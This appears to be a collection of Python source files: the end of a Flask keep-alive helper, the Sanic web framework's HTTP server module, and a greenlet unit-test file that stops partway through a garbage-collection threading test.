def keep_alive():
t = Thread(target=run)
t.start()
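# Typical usage sketch (e.g. to keep a hosted bot process alive; run_bot is hypothetical):
#   from web_server import keep_alive
#   keep_alive()   # starts the Flask app on port 8080 in a background thread
#   run_bot()      # the main long-running task continues in the main thread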
|
server.py
|
import asyncio
import os
import traceback
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser
from httptools.parser.errors import HttpParserError
from sanic.compat import Header
from sanic.exceptions import (
HeaderExpectationFailed,
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import EXPECT_HEADER, Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# app
"app",
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
app,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.app = app
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections if connections is not None else set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
        :return: ``True`` if the connection is to be kept alive, ``False`` otherwise
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=Header(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
app=self.app,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.request.headers.get(EXPECT_HEADER):
self.expect_handler()
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def expect_handler(self):
"""
Handler for Expect Header.
"""
expect = self.request.headers.get(EXPECT_HEADER)
if self.request.version == "1.1":
if expect.lower() == "100-continue":
self.transport.write(b"HTTP/1.1 100 Continue\r\n\r\n")
else:
self.write_error(
HeaderExpectationFailed(
"Unknown Expect: {expect}".format(expect=expect)
)
)
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.body_append(body)
)
else:
self.request.body_push(body)
async def body_append(self, body):
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.request.stream.put(None)
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
        Helper method that logs the response when
        :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
async def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
        If the transport pipe is closed and the sanic app encounters an error
        while writing data to it, we log the error with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport is None or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
(
self.transport.get_extra_info("peername")
if self.transport is not None
else "N/A"
),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
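# Added illustration (a sketch, not part of sanic): trigger_events accepts a
# mix of plain and async callables and awaits the async ones on the loop, e.g.
#
#   async def after_start(loop): ...
#   def before_stop(loop): ...
#   trigger_events([after_start], loop)   # awaitable result -> run_until_complete
#   trigger_events([before_stop], loop)   # plain callable, invoked synchronously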
def serve(
host,
port,
app,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
    :param graceful_shutdown_timeout: how long to wait before force-closing
                                      non-idle connections
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
if run_async:
return server_coroutine
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
        _signals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
        for _signal in _signals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
        # We should respect graceful_shutdown_timeout,
        # instead of letting connections hang forever.
        # Let's roughly calculate the time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
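# Added calling sketch (hypothetical values; in practice Sanic fills these
# settings in app.run(workers=N) before delegating here):
#
#   settings = dict(host="127.0.0.1", port=8000, app=app,
#                   request_handler=app.handle_request,
#                   error_handler=app.error_handler)
#   serve_multiple(settings, workers=4)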
|
test_greenlet.py
|
import gc
import sys
import time
import threading
import unittest
from abc import ABCMeta, abstractmethod
from greenlet import greenlet
# We manually manage locks in many tests
# pylint:disable=consider-using-with
class SomeError(Exception):
pass
def fmain(seen):
try:
greenlet.getcurrent().parent.switch()
except:
seen.append(sys.exc_info()[0])
raise
raise SomeError
def send_exception(g, exc):
# note: send_exception(g, exc) can be now done with g.throw(exc).
    # the purpose of this test is to explicitly check the propagation rules.
def crasher(exc):
raise exc
g1 = greenlet(crasher, parent=g)
g1.switch(exc)
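# Added note (illustration only): the modern equivalent of the helper above is
#   g.throw(exc)
# which raises exc inside g at its current switch point.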
class TestGreenlet(unittest.TestCase):
def test_simple(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.append(3)
g = greenlet(f)
lst.append(0)
g.switch()
lst.append(2)
g.switch()
lst.append(4)
self.assertEqual(lst, list(range(5)))
def test_parent_equals_None(self):
g = greenlet(parent=None)
self.assertIsNotNone(g)
self.assertIs(g.parent, greenlet.getcurrent())
def test_run_equals_None(self):
g = greenlet(run=None)
self.assertIsNotNone(g)
self.assertIsNone(g.run)
def test_two_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
lst.extend([1, 1])
g = greenlet(f)
h = greenlet(f)
g.switch()
self.assertEqual(len(lst), 1)
h.switch()
self.assertEqual(len(lst), 2)
h.switch()
self.assertEqual(len(lst), 4)
self.assertEqual(h.dead, True)
g.switch()
self.assertEqual(len(lst), 6)
self.assertEqual(g.dead, True)
def test_two_recursive_children(self):
lst = []
def f():
lst.append(1)
greenlet.getcurrent().parent.switch()
def g():
lst.append(1)
g = greenlet(f)
g.switch()
lst.append(1)
g = greenlet(g)
g.switch()
self.assertEqual(len(lst), 3)
self.assertEqual(sys.getrefcount(g), 2)
def test_threads(self):
success = []
def f():
self.test_simple()
success.append(True)
ths = [threading.Thread(target=f) for i in range(10)]
for th in ths:
th.start()
for th in ths:
th.join()
self.assertEqual(len(success), len(ths))
def test_exception(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
g2.parent = g1
self.assertEqual(seen, [])
self.assertRaises(SomeError, g2.switch)
self.assertEqual(seen, [SomeError])
g2.switch()
self.assertEqual(seen, [SomeError])
def test_send_exception(self):
seen = []
g1 = greenlet(fmain)
g1.switch(seen)
self.assertRaises(KeyError, send_exception, g1, KeyError)
self.assertEqual(seen, [KeyError])
def test_dealloc(self):
seen = []
g1 = greenlet(fmain)
g2 = greenlet(fmain)
g1.switch(seen)
g2.switch(seen)
self.assertEqual(seen, [])
del g1
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit])
del g2
gc.collect()
self.assertEqual(seen, [greenlet.GreenletExit, greenlet.GreenletExit])
def test_dealloc_other_thread(self):
seen = []
someref = []
lock = threading.Lock()
lock.acquire()
lock2 = threading.Lock()
lock2.acquire()
def f():
g1 = greenlet(fmain)
g1.switch(seen)
someref.append(g1)
del g1
gc.collect()
lock.release()
lock2.acquire()
greenlet() # trigger release
lock.release()
lock2.acquire()
t = threading.Thread(target=f)
t.start()
lock.acquire()
self.assertEqual(seen, [])
self.assertEqual(len(someref), 1)
del someref[:]
gc.collect()
# g1 is not released immediately because it's from another thread
self.assertEqual(seen, [])
lock2.release()
lock.acquire()
self.assertEqual(seen, [greenlet.GreenletExit])
lock2.release()
t.join()
def test_frame(self):
def f1():
            f = sys._getframe(0) # pylint:disable=protected-access
self.assertEqual(f.f_back, None)
greenlet.getcurrent().parent.switch(f)
return "meaning of life"
g = greenlet(f1)
frame = g.switch()
self.assertTrue(frame is g.gr_frame)
self.assertTrue(g)
from_g = g.switch()
self.assertFalse(g)
self.assertEqual(from_g, 'meaning of life')
self.assertEqual(g.gr_frame, None)
def test_thread_bug(self):
def runner(x):
g = greenlet(lambda: time.sleep(x))
g.switch()
t1 = threading.Thread(target=runner, args=(0.2,))
t2 = threading.Thread(target=runner, args=(0.3,))
t1.start()
t2.start()
t1.join()
t2.join()
def test_switch_kwargs(self):
def run(a, b):
self.assertEqual(a, 4)
self.assertEqual(b, 2)
return 42
x = greenlet(run).switch(a=4, b=2)
self.assertEqual(x, 42)
def test_switch_kwargs_to_parent(self):
def run(x):
greenlet.getcurrent().parent.switch(x=x)
greenlet.getcurrent().parent.switch(2, x=3)
return x, x ** 2
g = greenlet(run)
self.assertEqual({'x': 3}, g.switch(3))
self.assertEqual(((2,), {'x': 3}), g.switch())
self.assertEqual((3, 9), g.switch())
def test_switch_to_another_thread(self):
data = {}
error = None
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
try:
data['g'].switch()
except greenlet.error:
error = sys.exc_info()[1]
self.assertIsNotNone(error, "greenlet.error was not raised!")
done_event.set()
thread.join()
def test_exc_state(self):
def f():
try:
raise ValueError('fun')
except: # pylint:disable=bare-except
exc_info = sys.exc_info()
greenlet(h).switch()
self.assertEqual(exc_info, sys.exc_info())
def h():
self.assertEqual(sys.exc_info(), (None, None, None))
greenlet(f).switch()
def test_instance_dict(self):
def f():
greenlet.getcurrent().test = 42
def deldict(g):
del g.__dict__
def setdict(g, value):
g.__dict__ = value
g = greenlet(f)
self.assertEqual(g.__dict__, {})
g.switch()
self.assertEqual(g.test, 42)
self.assertEqual(g.__dict__, {'test': 42})
g.__dict__ = g.__dict__
self.assertEqual(g.__dict__, {'test': 42})
self.assertRaises(TypeError, deldict, g)
self.assertRaises(TypeError, setdict, g, 42)
def test_threaded_reparent(self):
data = {}
created_event = threading.Event()
done_event = threading.Event()
def run():
data['g'] = greenlet(lambda: None)
created_event.set()
done_event.wait()
def blank():
greenlet.getcurrent().parent.switch()
def setparent(g, value):
g.parent = value
thread = threading.Thread(target=run)
thread.start()
created_event.wait()
g = greenlet(blank)
g.switch()
self.assertRaises(ValueError, setparent, g, data['g'])
done_event.set()
thread.join()
def test_deepcopy(self):
import copy
self.assertRaises(TypeError, copy.copy, greenlet())
self.assertRaises(TypeError, copy.deepcopy, greenlet())
def test_parent_restored_on_kill(self):
hub = greenlet(lambda: None)
main = greenlet.getcurrent()
result = []
def worker():
try:
# Wait to be killed
main.switch()
except greenlet.GreenletExit:
# Resurrect and switch to parent
result.append(greenlet.getcurrent().parent)
result.append(greenlet.getcurrent())
hub.switch()
g = greenlet(worker, parent=hub)
g.switch()
del g
self.assertTrue(result)
self.assertEqual(result[0], main)
self.assertEqual(result[1].parent, hub)
def test_parent_return_failure(self):
# No run causes AttributeError on switch
g1 = greenlet()
# Greenlet that implicitly switches to parent
g2 = greenlet(lambda: None, parent=g1)
# AttributeError should propagate to us, no fatal errors
self.assertRaises(AttributeError, g2.switch)
def test_throw_exception_not_lost(self):
class mygreenlet(greenlet):
def __getattribute__(self, name):
try:
raise Exception()
except: # pylint:disable=bare-except
pass
return greenlet.__getattribute__(self, name)
g = mygreenlet(lambda: None)
self.assertRaises(SomeError, g.throw, SomeError())
def test_throw_doesnt_crash(self):
result = []
def worker():
greenlet.getcurrent().parent.switch()
def creator():
g = greenlet(worker)
g.switch()
result.append(g)
t = threading.Thread(target=creator)
t.start()
t.join()
self.assertRaises(greenlet.error, result[0].throw, SomeError())
def test_recursive_startup(self):
class convoluted(greenlet):
def __init__(self):
greenlet.__init__(self)
self.count = 0
def __getattribute__(self, name):
if name == 'run' and self.count == 0:
self.count = 1
self.switch(43)
return greenlet.__getattribute__(self, name)
def run(self, value):
while True:
self.parent.switch(value)
g = convoluted()
self.assertEqual(g.switch(42), 43)
def test_unexpected_reparenting(self):
another = []
def worker():
g = greenlet(lambda: None)
another.append(g)
g.switch()
t = threading.Thread(target=worker)
t.start()
t.join()
class convoluted(greenlet):
def __getattribute__(self, name):
if name == 'run':
self.parent = another[0] # pylint:disable=attribute-defined-outside-init
return greenlet.__getattribute__(self, name)
g = convoluted(lambda: None)
self.assertRaises(greenlet.error, g.switch)
def test_threaded_updatecurrent(self):
# released when main thread should execute
lock1 = threading.Lock()
lock1.acquire()
# released when another thread should execute
lock2 = threading.Lock()
lock2.acquire()
class finalized(object):
def __del__(self):
# happens while in green_updatecurrent() in main greenlet
# should be very careful not to accidentally call it again
# at the same time we must make sure another thread executes
lock2.release()
lock1.acquire()
# now ts_current belongs to another thread
def deallocator():
greenlet.getcurrent().parent.switch()
def fthread():
lock2.acquire()
greenlet.getcurrent()
del g[0]
lock1.release()
lock2.acquire()
greenlet.getcurrent()
lock1.release()
main = greenlet.getcurrent()
g = [greenlet(deallocator)]
g[0].bomb = finalized()
g[0].switch()
t = threading.Thread(target=fthread)
t.start()
# let another thread grab ts_current and deallocate g[0]
lock2.release()
lock1.acquire()
# this is the corner stone
# getcurrent() will notice that ts_current belongs to another thread
# and start the update process, which would notice that g[0] should
# be deallocated, and that will execute an object's finalizer. Now,
# that object will let another thread run so it can grab ts_current
# again, which would likely crash the interpreter if there's no
# check for this case at the end of green_updatecurrent(). This test
# passes if getcurrent() returns correct result, but it's likely
# to randomly crash if it's not anyway.
self.assertEqual(greenlet.getcurrent(), main)
# wait for another thread to complete, just in case
t.join()
def test_dealloc_switch_args_not_lost(self):
seen = []
def worker():
# wait for the value
value = greenlet.getcurrent().parent.switch()
# delete all references to ourself
del worker[0]
initiator.parent = greenlet.getcurrent().parent
# switch to main with the value, but because
# ts_current is the last reference to us we
# return immediately
try:
greenlet.getcurrent().parent.switch(value)
finally:
seen.append(greenlet.getcurrent())
def initiator():
return 42 # implicitly falls thru to parent
worker = [greenlet(worker)]
worker[0].switch() # prime worker
initiator = greenlet(initiator, worker[0])
value = initiator.switch()
self.assertTrue(seen)
self.assertEqual(value, 42)
def test_tuple_subclass(self):
if sys.version_info[0] > 2:
# There's no apply in Python 3.x
def _apply(func, a, k):
func(*a, **k)
else:
_apply = apply # pylint:disable=undefined-variable
class mytuple(tuple):
def __len__(self):
greenlet.getcurrent().switch()
return tuple.__len__(self)
args = mytuple()
kwargs = dict(a=42)
def switchapply():
_apply(greenlet.getcurrent().parent.switch, args, kwargs)
g = greenlet(switchapply)
self.assertEqual(g.switch(), kwargs)
def test_abstract_subclasses(self):
AbstractSubclass = ABCMeta(
'AbstractSubclass',
(greenlet,),
{'run': abstractmethod(lambda self: None)})
class BadSubclass(AbstractSubclass):
pass
class GoodSubclass(AbstractSubclass):
def run(self):
pass
GoodSubclass() # should not raise
self.assertRaises(TypeError, BadSubclass)
def test_implicit_parent_with_threads(self):
if not gc.isenabled():
return # cannot test with disabled gc
N = gc.get_threshold()[0]
if N < 50:
return # cannot test with such a small N
def attempt():
lock1 = threading.Lock()
lock1.acquire()
lock2 = threading.Lock()
lock2.acquire()
recycled = [False]
def another_thread():
lock1.acquire() # wait for gc
greenlet.getcurrent() # update ts_current
lock2.release() # release gc
t = threading.Thread(target=another_thread)
t.start()
class gc_callback(object):
def __del__(self):
lock1.release()
lock2.acquire()
recycled[0] = True
class garbage(object):
def __init__(self):
self.cycle = self
self.callback = gc_callback()
l = []
x = range(N*2)
